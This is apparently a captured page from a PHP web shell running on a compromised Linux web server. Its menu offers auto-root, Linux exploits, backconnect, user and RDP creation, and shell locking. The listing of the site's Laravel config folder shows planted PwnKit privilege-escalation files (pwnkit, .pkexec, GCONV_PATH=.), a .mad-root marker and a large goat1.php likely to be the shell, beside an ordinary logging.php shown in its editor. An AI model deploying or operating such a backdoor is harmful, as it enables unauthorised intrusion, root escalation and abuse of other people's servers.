Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.138
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo8.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
app.php
9.51
KB
-rw-r--r--
auth.php
3.06
KB
-rw-r--r--
broadcasting.php
1.57
KB
-rw-r--r--
cache.php
3.03
KB
-rw-r--r--
calling_codes.php
30.23
KB
-rw-r--r--
database.php
3.86
KB
-rw-r--r--
dompdf.php
10.14
KB
-rw-r--r--
filesystems.php
2.09
KB
-rw-r--r--
froiden_envato.php
1.65
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.52
KB
-rw-r--r--
installer.php
1.18
KB
-rw-r--r--
laratrust.php
8.23
KB
-rw-r--r--
laratrust_seeder.php
2.22
KB
-rw-r--r--
logging.php
2.17
KB
-rw-r--r--
mail.php
3.73
KB
-rw-r--r--
nexmo.php
2.81
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
2.58
KB
-rw-r--r--
services.php
2.67
KB
-rw-r--r--
session.php
6.86
KB
-rw-r--r--
translation-manager.php
1.44
KB
-rw-r--r--
view.php
1004
B
-rw-r--r--
vonage.php
3.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : logging.php
<?php use Monolog\Handler\StreamHandler; return [ /* |-------------------------------------------------------------------------- | Default Log Channel |-------------------------------------------------------------------------- | | This option defines the default log channel that gets used when writing | messages to the logs. The name specified in this option should match | one of the channels defined in the "channels" configuration array. | */ 'default' => env('LOG_CHANNEL', 'stack'), /* |-------------------------------------------------------------------------- | Log Channels |-------------------------------------------------------------------------- | | Here you may configure the log channels for your application. Out of | the box, Laravel uses the Monolog PHP logging library. This gives | you a variety of powerful log handlers / formatters to utilize. | | Available Drivers: "single", "daily", "slack", "syslog", | "errorlog", "monolog", | "custom", "stack" | */ 'channels' => [ 'stack' => [ 'driver' => 'stack', 'channels' => ['single'], ], 'single' => [ 'driver' => 'single', 'path' => storage_path('logs/laravel.log'), 'level' => 'debug', ], 'daily' => [ 'driver' => 'daily', 'path' => storage_path('logs/laravel.log'), 'level' => 'debug', 'days' => 7, ], 'slack' => [ 'driver' => 'slack', 'url' => env('LOG_SLACK_WEBHOOK_URL'), 'username' => 'Laravel Log', 'emoji' => ':boom:', 'level' => 'critical', ], 'stderr' => [ 'driver' => 'monolog', 'handler' => StreamHandler::class, 'with' => [ 'stream' => 'php://stderr', ], ], 'syslog' => [ 'driver' => 'syslog', 'level' => 'debug', ], 'errorlog' => [ 'driver' => 'errorlog', 'level' => 'debug', ], ], ];
Close